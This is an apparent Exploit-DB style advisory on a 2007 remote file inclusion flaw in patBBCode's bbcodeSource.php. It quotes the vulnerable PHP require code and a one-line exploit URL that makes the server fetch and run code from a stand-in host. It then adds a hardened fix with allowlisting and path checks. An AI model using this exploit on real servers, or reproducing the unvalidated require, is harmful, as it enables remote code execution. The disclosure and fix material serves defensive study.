Vendor: patBBCode
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: patBBCode
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

PHP-Tools patBBCode Remote File Inclusion Vulnerability

The vulnerability allows remote attackers to include and execute arbitrary files by supplying a URL in the 'example' parameter of examples\patExampleGen\bbcodeSource.php, which the script passes to require() without validation.

Mitigation:

Upgrade to a patched version of the software or sanitize user input before including files.

Exploit-DB raw data:

Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file:
examples\patExampleGen\bbcodeSource.php

Vuln code:
    <?php
    // bbcodeSource.php (excerpt): the 'example' query parameter is used
    // directly as a file name, with no validation of its contents
    if( !isset( $_GET['example'] ) )
        die( 'No example selected.' );

    $exampleId = $_GET['example'];

    ob_start();

    // make the example think it's still in the right place
    chdir( '../' );

    // include the example: $exampleId is attacker-controlled, so with
    // allow_url_include enabled a remote URL is fetched and executed (RFI)
    require $exampleId.'.php';

    ob_end_clean();

Exploit:
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php

# milw0rm.com [2007-11-12]
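The following is an added example, not code from patBBCode or the original advisory: a hardened replacement for the unchecked require shown above. The function name resolveExamplePath and the assumption that example files live in the parent directory of bbcodeSource.php are illustrative choices.

```php
<?php
// Added example (not part of patBBCode): a hardened replacement for the
// unchecked "require $exampleId.'.php'" in bbcodeSource.php. The function
// name and the examples directory location are assumptions.

declare(strict_types=1);

/**
 * Resolve a user-supplied example id to a PHP file inside $examplesDir.
 * Returns the absolute path on success, or null if the id must be rejected.
 */
function resolveExamplePath(string $exampleId, string $examplesDir): ?string
{
    // 1. Syntactic allowlist: only short, simple identifiers. This alone rules
    //    out URLs ("http://..."), traversal ("../"), null bytes and stream
    //    wrappers such as "php://" or "data:".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $exampleId)) {
        return null;
    }

    // 2. Resolve both sides to canonical paths and require containment, so a
    //    symlink or mis-configured $examplesDir cannot escape the directory.
    $base      = realpath($examplesDir);
    $candidate = realpath($examplesDir . DIRECTORY_SEPARATOR . $exampleId . '.php');
    if ($base === false || $candidate === false) {
        return null;   // missing file or directory: treat as "no such example"
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // resolved outside the examples directory
    }
    return $candidate;
}

// --- usage in place of the original vulnerable block ---
if (!isset($_GET['example'])) {
    die('No example selected.');
}

$path = resolveExamplePath((string) $_GET['example'], __DIR__ . '/..');
if ($path === null) {
    http_response_code(400);
    die('Invalid example selected.');
}

ob_start();
chdir(dirname($path));   // keep the example's relative paths working
require $path;           // only a vetted file under the examples directory
ob_end_clean();
```

As defence in depth, keep allow_url_include=Off in php.ini so that even an unvalidated require cannot fetch code over HTTP.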